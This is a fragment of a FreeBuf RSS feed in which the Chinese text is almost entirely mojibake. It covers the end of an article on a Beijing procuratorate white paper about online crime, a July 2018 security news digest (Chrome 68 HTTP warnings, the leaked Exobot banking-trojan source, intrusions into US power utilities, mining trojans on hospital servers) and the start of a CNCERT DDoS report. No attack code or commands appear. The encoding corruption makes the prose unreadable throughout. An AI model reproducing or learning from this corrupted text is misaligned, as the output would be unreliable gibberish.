1940<p style="text-align: justify;">éšç€â€œäº’è”网+â€ã€ä¿¡æ¯åŒ–建设的å‘展,具有公共æœåŠ¡èŒèƒ½çš„æ”¿åºœä¿¡æ¯ç³»ç»Ÿã€äº’è”网消费平å°ç‰å¼€å§‹è®¾ç½®å…·æœ‰ä¸€å®šå‚¨å€¼åŠŸèƒ½çš„å¹³å°,ç”±äºŽç³»ç»Ÿæœ¬èº«çš„æ¼æ´žæˆ–维护ä¸åŠæ—¶ç‰åŽŸå› ,给了犯罪分å以å¯ä¹˜ä¹‹æœºã€‚</p>
1941</p>
1942<h2><strong>五 ç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ª</strong></h2>
1943</p>
1944<p style="text-align: justify;">éšç€äº’è”网应用场景和互è”网技术的普åŠ,ä¼ ç»ŸçŠ¯ç½ªä¸Žç½‘ç»œå¹³å°ã€ç½‘络技术相结åˆ,开始出现了赌åšã€è´©æ¯’ã€è‰²æƒ…ç‰ä¼ 统犯罪å‘ç½‘ç»œç¤¾ä¼šçš„å»¶ä¼¸å’Œæ‰©å¼ çš„çŽ°è±¡ï¼Œè¡ç”Ÿå‡ºç½‘络赌åšã€ç½‘络色情ã€è´©å–毒å“ã€äº’è”网金èžè¯ˆéª—ç‰çŠ¯ç½ª,并出现从PC端å‘移动互è”端蔓延的趋势。</p>
1945</p>
1946<h3>1 ä¼ æ’æ·«ç§½ç‰©å“</h3>
1947</p>
1948<p style="text-align: justify;">微信群ç‰ç¤¾äº¤å·¥å…·çš„å‘展大大æé«˜äº†ä¿¡æ¯ä¼ æ’的效率,由于信æ¯é‡å·¨å¤§,监管难度高,导致淫秽信æ¯åœ¨ç½‘络空间泛滥。</p>
1949</p>
1950<h3>2 网络赌åšã€å¼€è®¾èµŒåœº</h3>
1951</p>
1952<p style="text-align: justify;">通过互è”网开设赌场,大大æé«˜äº†èµŒåšçš„ä¼ æ’æ•ˆçŽ‡ã€‚ç”±äºŽç½‘ç»œç©ºé—´éšè”½,æœåŠ¡å™¨é€šå¸¸æž¶è®¾åœ¨å¢ƒå¤–,网站线上åªè®¡ç®—点数,资金线通过线下代ç†å•†æµè½¬,å› æ¤åœ¨æ²¡æœ‰æå–åŽæ¥æ•°æ®çš„æƒ…况下很难统计出真实赌资。</p>
1953</p>
1954<h3>3 ç½‘ç»œè´©å–æ¯’å“</h3>
1955</p>
1956<p style="text-align: justify;">毒å“交易由于其é—åˆçš„特å¾ï¼Œå³ä½¿æ˜¯åœ¨çŽ°å®žç©ºé—´ä¹Ÿå¾ˆéš¾æ‰“å‡»ã€‚è€Œéšç€äº’è”网的使用,行为人通过网络è´ä¹°ã€è´©å–毒å“,ç”šè‡³æ˜¯èµ°ç§æ¯’å“,ä¹°å–åŒæ–¹é€šè¿‡äº’è”ç½‘å¹³å°æ›´åŠ æ–¹ä¾¿å¿«æ·åœ°è¿›è¡Œäº’è”,而ä¸éœ€è¦åŒæ–¹å‡ºé¢å°±èƒ½å®Œæˆäº¤æ˜“,使毒å“äº¤æ˜“æ›´åŠ éšè”½,åŠ å¤§äº†æ‰“å‡»çš„å›°éš¾ã€‚</p>
1957</p>
1958<h3>4 互è”ç½‘éžæ³•集资</h3>
1959</p>
1960<p style="text-align: justify;">éžæ³•集资类案件在“互è”网+â€çš„场景下出现了新的æ€åŠ¿å’Œç‰¹ç‚¹,互è”网的应用使得金èžäº§å“ç»è¥è€…ä¸Žå…¬ä¼—çš„é“¾æŽ¥æ›´åŠ ä¾¿æ·,金èžäº§å“进入的门槛也在é™ä½Ž,è¾ƒä¹‹ä¼ ç»Ÿçš„éžæ³•集资犯罪,å—å®³äººæŠ•èµ„çš„æ•°é¢æ›´å°‘。</p>
1961</p>
1962<h3>5 以第三方支付平å°ä¸ºå¯¹è±¡çš„盗窃ã€è¯ˆéª—</h3>
1963</p>
1964<p style="text-align: justify;">éšç€ç§»åŠ¨æ”¯ä»˜çš„æ™®åŠ,äººä»¬åœ¨æ”¯ä»˜åœºæ™¯ä¸‹é€‰æ‹©ä½¿ç”¨ç¬¬ä¸‰æ–¹å¹³å°æ”¯ä»˜æˆä¸ºå¸¸æ€ã€‚用户开通支付账户将自己的钱款å˜å…¥å…¶ä¸,ç»‘å®šå˜æ¬¾çš„银行å¡,æˆä¸ºçŠ¯ç½ªåˆ†å觊觎的对象。</p>
1965</p>
1966<p><strong>检察院如何应对</strong></p>
1967</p>
1968<p style="text-align: justify;">为积æžåº”å¯¹ç½‘ç»œçŠ¯ç½ªäº§ä¸šåŒ–ã€æ–°åž‹åŒ–ã€å¤æ‚åŒ–ç‰æŒ‘战,适应首都战略定ä½å¯¹æ£€å¯Ÿæœºå…³æœåŠ¡ä¿éšœç§‘æŠ€åˆ›æ–°çš„æ›´é«˜è¦æ±‚,北京市检察机关æŒç»åŠ å¼ºç½‘ç»œçŠ¯ç½ªåŠžæ¡ˆä¸“ä¸šåŒ–å»ºè®¾,利用专业优势,æ›´å¥½åœ°å‘æŒ¥å®¡å‰ç¨‹åºä¸çš„ä¸»å¯¼ä½œç”¨ã€æŒ‡æŽ§å’Œè¯æ˜ŽçŠ¯ç½ªçš„ä¸»ä½“ä½œç”¨,切实履行监ç£ã€å®¡æŸ¥ã€è¿½è¯‰æ³•定èŒè´£,æŽ¨åŠ¨ç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤è¿ˆä¸Šæ–°å°é˜¶ã€‚</p>
1969</p>
1970<p style="text-align: justify;">1)æŒç»åˆ›æ–°ä¸“业化办案机制,精准高效办ç†ç½‘络犯罪案件。 </p>
1971<blockquote><p>æ•´åˆä¸“业化办案资æº,办ç†é‡å¤§ç–‘éš¾å¤æ‚案件。</p>
1972<p>呿Œ¥æµ·æ·€åŒºé«˜æ ¡ã€ç§‘ç ”é™¢æ‰€èµ„æºé›†ä¸çš„优æå»ºæ£€å¦å…±å»ºå¹³å°,建立“外脑â€ä¸“家积æžå¼€å±•专家咨询,大大æå‡åŠžæ¡ˆè´¨æ•ˆã€‚</p>
1973<p>å¼€å±•ä¸“ä¸šåŒæ¥è¾…助审查,è§£å†³ç”µåæ•°æ®å®¡æŸ¥éš¾é¢˜ã€‚</p>
1974</blockquote>
1975<p style="text-align: justify;">2)积æžå‘挥æå‰ä»‹å…¥ä¼˜åŠ¿ï¼Œå¼•å¯¼ä¾¦æŸ¥å–è¯æœ‰åŠ›ã€‚</p>
1976</p>
1977<p style="text-align: justify;">3)积æžå‚与社会治ç†åˆ›æ–°åˆ‡å®žæŽ¨åŠ¨ç½‘ç»œå®‰å…¨ä¿æŠ¤ã€‚</p>
1978</p>
1979<blockquote><p>å†…å®¹æ¥æºäºŽåŒ—äº¬å¸‚æµ·æ·€åŒºäººæ°‘æ£€å¯Ÿé™¢ã€Šç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦ã€‹ï¼Œå…¨æ–‡å®Œæ•´ç‰ˆä¸‹è½½é“¾æŽ¥ï¼š</p>
1980<p><a href="https://pan.baidu.com/s/1LY2VniFD5UZNiYCF8hQdtw">https://pan.baidu.com/s/1LY2VniFD5UZNiYCF8hQdtw</a></p>
1981</blockquote>
1982<p><b style="color: rgb(159, 163, 168);">*本文作者:boshit,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1983]]></content:encoded>
1984 <wfw:commentRss>http://www.freebuf.com/articles/network/178114.html/feed</wfw:commentRss>
1985 <slash:comments>0</slash:comments>
1986 </item>
1987 <item>
1988 <title>BUFæ—©é¤é“º | Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮;安å“银行木马 Exobot çš„æºä»£ç éæ³„露;Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ï¼›</title>
1989 <link>http://www.freebuf.com/news/178566.html</link>
1990 <comments>http://www.freebuf.com/news/178566.html#comments</comments>
1991 <pubDate>Tue, 24 Jul 2018 23:00:17 +0000</pubDate>
1992 <dc:creator>shidongqi</dc:creator>
1993 <category><![CDATA[资讯]]></category>
1994 <category><![CDATA[BUFæ—©é¤é“º]]></category>
1995 <category><![CDATA[chrome]]></category>
1996 <category><![CDATA[安å“]]></category>
1997
1998 <guid isPermaLink="false">http://www.freebuf.com/?p=178566</guid>
1999 <description><![CDATA[å„ä½Buffer早上好,今天是2018å¹´7月25æ—¥æ˜ŸæœŸä¸‰ï¼Œå†œåŽ†å…æœˆå三。今天份的BUFæ—©é¤å†…å®¹ä¸»è¦æœ‰ï¼š Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮;安å“银行木马 Exobot çš„æºä»£ç éæ³„露;Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ï¼›ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤ï¼›å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåС噍é黑客入侵,通过木马挖矿。 安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~ Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ å¾®è½¯çš„æ•°æ®æ”¶é›†æ–¹å¼åކæ¥å¤‡å—争议,近日开始é¢å‘所有Windows 7/8.1设备分别推é€äº†KB2952664å’ŒKB2976978更新。ä¸è¿‡å’Œä»¥å¾€æ›´æ–°éƒ¨ç½²æœ‰æ‰€ä¸åŒï¼Œæ¤å‰è¯¥ä¸¤ä¸ªæ›´æ–°å‡ä¸ºå¯é€‰æ›´æ–°ï¼Œç”¨æˆ·éœ€è¦æ‰‹åЍæ“作æ‰èƒ½éƒ¨ç½²ã€‚è€ŒçŽ°åœ¨å¾®è½¯å°†è¿™ä¸¤ä¸ªæ›´æ–°æ ‡è®°ä¸ºâ€œå…³é”®â€ï¼Œæ„å‘³ç€æ‰€æœ‰è®¾å¤‡éƒ½ä¼šé€šè¿‡Windows Updateè¿›è¡Œéƒ¨ç½²ï¼Œè€Œè¿™æ— ç–‘åŠ å‰§äº†å¯¹å¾®è½¯é¥æµ‹æœåŠ¡çš„åæ§½ã€‚[æ¥æºï¼šcnBeta] Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮 在 7 月 24 å·å‘布的 Chrome 68 ä¸ï¼ŒGoogle 引入了一项é‡å¤§çš„å˜åŒ–ã€‚å½“åŠ è½½éž HTTPS 网站时,该æµè§ˆå™¨çš„å¤„ç†æ–¹å¼ä¼šæ›´åŠ å®¡æ…Žã€‚æ®æ‚‰ï¼Œåªè¦é‡åˆ°æ½œåœ¨ä¸å®‰å…¨çš„站点,Chrome 都将开始抛出è¦å‘Šä¿¡æ¯ã€‚虽然ä¸ä¼šå¯¹æ—¥å¸¸ä½¿ç”¨é€ æˆå¤ªå¤§çš„å½±å“,但这确实是迄今为æ¢å‘生的一个é‡å¤§è½¬å˜ã€‚在之å‰ç‰ˆæœ¬çš„ Chrome æµè§ˆå™¨ä¸ï¼ŒGoogle è¿˜åªæ˜¯å¼ºè°ƒâ€œå½“å‰è®¿é—®çš„网站是å¦é‡‡è®¿ç”¨äº†æ›´åŠ å®‰å…¨çš„ HTTPS åŠ å¯†â€ï¼Œå¹¶åœ¨åœ°å€æ ä¸Šå‡¸æ˜¾ä¸€ä¸ªæ ‡è®°ã€‚[æ¥æºï¼šcnBeta] 安å“银行木马 Exobot çš„æºä»£ç éæ³„露 Exobot æ˜¯ä¸€æ¬¾å¼ºå¤§çš„å®‰å“æœ¨é©¬ï¼Œé¦–次于2016年末出现在大众视野,而在今年1月份被出售é到作者神秘抛弃。ThreatFabric å…¬å¸çš„ç ”ç©¶å‘˜è¡¨ç¤ºï¼ŒExobot 木马的æºä»£ç 实际上在5月份就已被泄露到网上:当时一å买家决定在圈å内分享该æºä»£ç 。自æ¤ï¼Œç¬”者å‘现 Exobot çš„æºä»£ç 现在æ£åœ¨å¤šä¸ªåœ°ä¸‹é»‘客论å›ä¸Šä¼ æ’ã€‚å®‰å…¨ç ”ç©¶å‘˜çŽ°åœ¨æ‹…å¿ƒæºä»£ç éæ³„露å¯èƒ½å¯¼è‡´è¶Šæ¥è¶Šå¤šçš„安å“应用会é该木马感染。[æ¥æºï¼šCodeSafe] ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤ 美国国土安全部官员称,俄罗斯黑客入侵了电力公å¸è¢«è®¤ä¸ºå®‰å…¨çš„隔离网络。黑客甚至找到方法能打开开关和干扰电力输é€ã€‚针对美国电力公å¸çš„黑客攻击始于去年底,很有å¯èƒ½ä»åœ¨ç»§ç»ã€‚美国国土安全部从 2014 å¹´èµ·å°±è¦å‘Šç”µåЛ公å¸é«˜ç®¡æ³¨æ„俄罗斯黑客组织对基础设施的å¨èƒï¼Œæœ¬å‘¨å®ƒé¦–次披露了攻击细节,称å—害者多达数百个,部分公å¸å¯èƒ½ä»ç„¶ä¸çŸ¥é“他们已ç»éåˆ°äº†å…¥ä¾µï¼Œå› ä¸ºæ”»å‡»è€…åˆ©ç”¨äº†å…¬å¸é›‡å‘˜çš„å‡è¯æ¸—é€åˆ°å†…网,让入侵难以å‘现。 攻击者首先是利用钓鱼攻击窃å–登录å‡è¯å…¥ä¾µä¾›åº”商的内部网络。一旦渗é€åˆ°ä¾›åº”商的网络,他们开始转å‘真æ£çš„ç›®æ ‡â€”â€”ç”µåŠ›å…¬å¸ã€‚这个过程相对比较简å•,很多情况下窃å–了供应商的å‡è¯ä¹‹åŽä»–们就能直接访问电力公å¸çš„网络,然åŽå¼€å§‹çªƒå–机密信æ¯ï¼Œå¦‚电力公å¸ç½‘络的é…置信æ¯ï¼Œåªæœ‰åœ¨ç†Ÿæ‚‰å…¶ç½‘络之åŽä»–们æ‰èƒ½è¿›ä¸€æ¥çš„干扰其è¿ä½œã€‚攻击者还将自己伪装æˆèƒ½ç»å¸¸æŽ¥è§¦è¿™äº›ç³»ç»Ÿçš„人。[æ¥æºï¼šSolidot] 多家三甲医院æœåС噍é黑客入侵,通过木马挖矿 æ®è…¾è®¯å¾¡è§å¨èƒæƒ…报ä¸å¿ƒæ¶ˆæ¯ï¼Œè¿‘期该机构检测到广东ã€é‡åº†å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåŠ¡å™¨è¢«é»‘å®¢å…¥ä¾µï¼Œæ”»å‡»è€…æš´åŠ›ç ´è§£åŒ»é™¢æœåŠ¡å™¨çš„è¿œç¨‹ç™»å½•æœåŠ¡ï¼Œä¹‹åŽåˆ©ç”¨æœ‰é“ç¬”è®°çš„åˆ†äº«æ–‡ä»¶åŠŸèƒ½ä¸‹è½½å¤šç§æŒ–矿木马。 è¯¥æœºæž„è¡¨ç¤ºï¼Œæ”»å‡»è€…ä½¿ç”¨çš„æŒ–çŸ¿æœ¨é©¬æ‹¥æœ‰å¤šä¸ªçŸ¿æ± ï¼Œå¼€æŒ–çš„å±±å¯¨åŠ å¯†å¸åŒ…括:门罗å¸ã€ä»¥å¤ªåŠã€é›¶å¸ç‰ç‰ï¼Œä»ŽçŸ¿æ± ä¿¡æ¯çœ‹ï¼Œç›®å‰æ”»å‡»è€…已累积获利达40余万元人民å¸ã€‚我国医疗机构开放远程登录æœåŠ¡ï¼ˆç«¯å£å·ï¼š22)的比例高达50%,这æ„å‘³ç€æœ‰ä¸€åŠçš„æœåŠ¡å™¨å¯èƒ½éé‡ç›¸åŒçš„æ”»å‡»ã€‚[æ¥æºï¼šBianews] *本文由Andy.iæ•´ç†ç¼–译,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
2000 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">å„ä½Buffer早上好,今天是2018å¹´7月25æ—¥æ˜ŸæœŸä¸‰ï¼Œå†œåŽ†å…æœˆå三。今天份的BUFæ—©é¤å†…å®¹ä¸»è¦æœ‰ï¼š Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮;安å“银行木马 Exobot çš„æºä»£ç éæ³„露;Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ï¼›ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤ï¼›å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåС噍é黑客入侵,通过木马挖矿。</b></p>
2001<p style="text-align: center;"><b style="color: rgb(0, 176, 80);"><span style="font-size: 15px; color: rgb(239, 71, 71);">安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~</span><br /></b></p>
2002<p style="text-align: center;"> <embed src="//music.163.com/outchain/player?type=3&id=1370291949&auto=0&height=66" width="330" height="110"></p>
2003<h3><img alt="meal-2069021_960_720.jpg" src="http://image.3001.net/images/20180724/15324152169228.jpg!small" width="690" height="459">Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½<br /></h3>
2004<p>å¾®è½¯çš„æ•°æ®æ”¶é›†æ–¹å¼åކæ¥å¤‡å—争议,近日开始é¢å‘所有Windows 7/8.1设备分别推é€äº†KB2952664å’ŒKB2976978更新。ä¸è¿‡å’Œä»¥å¾€æ›´æ–°éƒ¨ç½²æœ‰æ‰€ä¸åŒï¼Œæ¤å‰è¯¥ä¸¤ä¸ªæ›´æ–°å‡ä¸ºå¯é€‰æ›´æ–°ï¼Œç”¨æˆ·éœ€è¦æ‰‹åЍæ“作æ‰èƒ½éƒ¨ç½²ã€‚è€ŒçŽ°åœ¨å¾®è½¯å°†è¿™ä¸¤ä¸ªæ›´æ–°æ ‡è®°ä¸ºâ€œå…³é”®â€ï¼Œæ„å‘³ç€æ‰€æœ‰è®¾å¤‡éƒ½ä¼šé€šè¿‡Windows Updateè¿›è¡Œéƒ¨ç½²ï¼Œè€Œè¿™æ— ç–‘åŠ å‰§äº†å¯¹å¾®è½¯é¥æµ‹æœåŠ¡çš„åæ§½ã€‚[æ¥æºï¼š<a href="https://www.cnbeta.com/articles/tech/749763.htm" target="_blank" ref="">cnBeta</a>] </p>
2005<h3>Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮<br /></h3>
2006<p>在 7 月 24 å·å‘布的 Chrome 68 ä¸ï¼ŒGoogle 引入了一项é‡å¤§çš„å˜åŒ–ã€‚å½“åŠ è½½éž HTTPS 网站时,该æµè§ˆå™¨çš„å¤„ç†æ–¹å¼ä¼šæ›´åŠ å®¡æ…Žã€‚æ®æ‚‰ï¼Œåªè¦é‡åˆ°æ½œåœ¨ä¸å®‰å…¨çš„站点,Chrome 都将开始抛出è¦å‘Šä¿¡æ¯ã€‚虽然ä¸ä¼šå¯¹æ—¥å¸¸ä½¿ç”¨é€ æˆå¤ªå¤§çš„å½±å“,但这确实是迄今为æ¢å‘生的一个é‡å¤§è½¬å˜ã€‚在之å‰ç‰ˆæœ¬çš„ Chrome æµè§ˆå™¨ä¸ï¼ŒGoogle è¿˜åªæ˜¯å¼ºè°ƒâ€œå½“å‰è®¿é—®çš„网站是å¦é‡‡è®¿ç”¨äº†æ›´åŠ å®‰å…¨çš„ HTTPS åŠ å¯†â€ï¼Œå¹¶åœ¨åœ°å€æ ä¸Šå‡¸æ˜¾ä¸€ä¸ªæ ‡è®°ã€‚[æ¥æºï¼š<a href="https://www.cnbeta.com/articles/tech/749991.htm" target="_blank" ref="">cnBeta</a>] </p>
2007<h3>安å“银行木马 Exobot çš„æºä»£ç éæ³„露<br /></h3>
2008<p>Exobot æ˜¯ä¸€æ¬¾å¼ºå¤§çš„å®‰å“æœ¨é©¬ï¼Œé¦–次于2016年末出现在大众视野,而在今年1月份被出售é到作者神秘抛弃。ThreatFabric å…¬å¸çš„ç ”ç©¶å‘˜è¡¨ç¤ºï¼ŒExobot 木马的æºä»£ç 实际上在5月份就已被泄露到网上:当时一å买家决定在圈å内分享该æºä»£ç 。自æ¤ï¼Œç¬”者å‘现 Exobot çš„æºä»£ç 现在æ£åœ¨å¤šä¸ªåœ°ä¸‹é»‘客论å›ä¸Šä¼ æ’ã€‚å®‰å…¨ç ”ç©¶å‘˜çŽ°åœ¨æ‹…å¿ƒæºä»£ç éæ³„露å¯èƒ½å¯¼è‡´è¶Šæ¥è¶Šå¤šçš„安å“应用会é该木马感染。[æ¥æºï¼š<a href="http://codesafe.cn/index.php?r=news/detail&id=4328" target="_blank" ref="">CodeSafe</a>]</p>
2009<h3>ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤<br /></h3>
2010<p>美国国土安全部官员称,俄罗斯黑客入侵了电力公å¸è¢«è®¤ä¸ºå®‰å…¨çš„隔离网络。黑客甚至找到方法能打开开关和干扰电力输é€ã€‚针对美国电力公å¸çš„黑客攻击始于去年底,很有å¯èƒ½ä»åœ¨ç»§ç»ã€‚美国国土安全部从 2014 å¹´èµ·å°±è¦å‘Šç”µåЛ公å¸é«˜ç®¡æ³¨æ„俄罗斯黑客组织对基础设施的å¨èƒï¼Œæœ¬å‘¨å®ƒé¦–次披露了攻击细节,称å—害者多达数百个,部分公å¸å¯èƒ½ä»ç„¶ä¸çŸ¥é“他们已ç»éåˆ°äº†å…¥ä¾µï¼Œå› ä¸ºæ”»å‡»è€…åˆ©ç”¨äº†å…¬å¸é›‡å‘˜çš„å‡è¯æ¸—é€åˆ°å†…网,让入侵难以å‘现。</p>
2011<p>攻击者首先是利用钓鱼攻击窃å–登录å‡è¯å…¥ä¾µä¾›åº”商的内部网络。一旦渗é€åˆ°ä¾›åº”商的网络,他们开始转å‘真æ£çš„ç›®æ ‡â€”â€”ç”µåŠ›å…¬å¸ã€‚这个过程相对比较简å•,很多情况下窃å–了供应商的å‡è¯ä¹‹åŽä»–们就能直接访问电力公å¸çš„网络,然åŽå¼€å§‹çªƒå–机密信æ¯ï¼Œå¦‚电力公å¸ç½‘络的é…置信æ¯ï¼Œåªæœ‰åœ¨ç†Ÿæ‚‰å…¶ç½‘络之åŽä»–们æ‰èƒ½è¿›ä¸€æ¥çš„干扰其è¿ä½œã€‚攻击者还将自己伪装æˆèƒ½ç»å¸¸æŽ¥è§¦è¿™äº›ç³»ç»Ÿçš„人。[æ¥æºï¼š<a href="https://www.solidot.org/story?sid=57306" target="_blank" ref="">Solidot</a>]</p>
2012<h3>多家三甲医院æœåС噍é黑客入侵,通过木马挖矿<br /></h3>
2013<p>æ®è…¾è®¯å¾¡è§å¨èƒæƒ…报ä¸å¿ƒæ¶ˆæ¯ï¼Œè¿‘期该机构检测到广东ã€é‡åº†å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåŠ¡å™¨è¢«é»‘å®¢å…¥ä¾µï¼Œæ”»å‡»è€…æš´åŠ›ç ´è§£åŒ»é™¢æœåŠ¡å™¨çš„è¿œç¨‹ç™»å½•æœåŠ¡ï¼Œä¹‹åŽåˆ©ç”¨æœ‰é“ç¬”è®°çš„åˆ†äº«æ–‡ä»¶åŠŸèƒ½ä¸‹è½½å¤šç§æŒ–矿木马。</p>
2014<p>è¯¥æœºæž„è¡¨ç¤ºï¼Œæ”»å‡»è€…ä½¿ç”¨çš„æŒ–çŸ¿æœ¨é©¬æ‹¥æœ‰å¤šä¸ªçŸ¿æ± ï¼Œå¼€æŒ–çš„å±±å¯¨åŠ å¯†å¸åŒ…括:门罗å¸ã€ä»¥å¤ªåŠã€é›¶å¸ç‰ç‰ï¼Œä»ŽçŸ¿æ± ä¿¡æ¯çœ‹ï¼Œç›®å‰æ”»å‡»è€…已累积获利达40余万元人民å¸ã€‚我国医疗机构开放远程登录æœåŠ¡ï¼ˆç«¯å£å·ï¼š22)的比例高达50%,这æ„å‘³ç€æœ‰ä¸€åŠçš„æœåŠ¡å™¨å¯èƒ½éé‡ç›¸åŒçš„æ”»å‡»ã€‚[æ¥æºï¼š<a href="https://www.bianews.com/news/flash?id=16964" target="_blank" ref="">Bianews</a>]</p>
2015<p><b style="color: rgb(159, 163, 168);">*本文由Andy.iæ•´ç†ç¼–译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
2016]]></content:encoded>
2017 <wfw:commentRss>http://www.freebuf.com/news/178566.html/feed</wfw:commentRss>
2018 <slash:comments>4</slash:comments>
2019 </item>
2020 <item>
2021 <title>CNCERT:我国DDoSæ”»å‡»èµ„æºæœˆåº¦åŠ2018年上åŠå¹´æ²»ç†æƒ…å†µåˆ†æžæŠ¥å‘Š</title>
2022 <link>http://www.freebuf.com/articles/paper/178568.html</link>
2023 <comments>http://www.freebuf.com/articles/paper/178568.html#comments</comments>
2024 <pubDate>Tue, 24 Jul 2018 11:02:34 +0000</pubDate>
2025 <dc:creator>CNCERT</dc:creator>
2026 <category><![CDATA[安全报告]]></category>
2027 <category><![CDATA[CNCERT]]></category>
2028 <category><![CDATA[ddos]]></category>
2029
2030 <guid isPermaLink="false">http://www.freebuf.com/?p=178568</guid>
2031 <description><![CDATA[本月é‡ç‚¹å…³æ³¨æƒ…况 1ã€æœ¬æœˆåˆ©ç”¨è‚‰é¸¡å‘èµ·DDoS攻击的控制端ä¸ï¼Œå¢ƒå¤–控制端近一åŠä½äºŽç¾Žå›½ï¼›å¢ƒå†…控制端最多ä½äºŽåŒ—京市,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼ŒæŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大。 2ã€æœ¬æœˆå‚与攻击较多的肉鸡地å€ä¸»è¦ä½äºŽåŒ—京市ã€è´µå·žçœã€å››å·çœå’Œäº‘å—çœï¼Œå…¶ä¸å¤§é‡è‚‰é¸¡åœ°å€å½’属于电信è¿è¥å•†ã€‚2018年以æ¥ç›‘测到的æŒç»æ´»è·ƒçš„肉鸡资æºä¸ï¼Œä½äºŽå±±ä¸œçœã€ä¸Šæµ·å¸‚ã€å¹¿ä¸œçœå 的比例最大。 3ã€æœ¬æœˆè¢«åˆ©ç”¨å‘èµ·Memcachedå射攻击境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å±±ä¸œçœã€å¹¿ä¸œçœå’ŒåŒ—äº¬å¸‚ï¼Œæ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç”µä¿¡ã€‚被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å¹¿ä¸œçœã€å±±ä¸œçœå’Œç”˜è‚ƒçœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç§»åŠ¨ã€‚è¢«åˆ©ç”¨å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯è¾½å®çœã€æ±Ÿè‹çœå’Œæ²³å—çœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯è”通。 4ã€æœ¬æœˆè½¬å‘ä¼ªé€ è·¨åŸŸæ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于新疆维å¾å°”自治区移动的æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›åŒ—äº¬å¸‚ã€æ±Ÿè‹çœå’Œå±±ä¸œçœçš„è·¨åŸŸä¼ªé€ æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚ 5ã€æœ¬æœˆè½¬å‘ä¼ªé€ æœ¬åœ°æ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于山西çœç”µä¿¡çš„æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›æ±Ÿè‹çœã€å±±è¥¿çœã€é™•西çœå’Œå¹¿ä¸œçœçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚ 6ã€ç»è¿‡åŠå¹´æ¥é’ˆå¯¹æˆ‘国境内的攻击资æºçš„专项治ç†å·¥ä½œï¼Œå¢ƒå†…控制端ã€è‚‰é¸¡ç‰èµ„æºçš„æœˆæ´»è·ƒæ•°é‡è¾ƒ2017年有了较明显的下é™è¶‹åŠ¿ï¼›å¢ƒå†…æŽ§åˆ¶ç«¯ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ç‰èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼æœ‰ä¸€å®šç¨‹åº¦çš„上å‡ï¼Œæ„味ç€èµ„æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„资æºç¨³å®šæ€§é™ä½Žï¼›å¢ƒå†…åå°„æœåŠ¡å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼ï¼Œæ–°å¢žçއå˜åŒ–䏿˜Žæ˜¾ã€æ¶ˆäº¡çŽ‡å‘ˆçŽ°ä¸€å®šç¨‹åº¦çš„ä¸‹é™ï¼Œæ„味ç€å¯åˆ©ç”¨çš„èµ„æºæ•°é‡é€æ¥å‡å°‘。 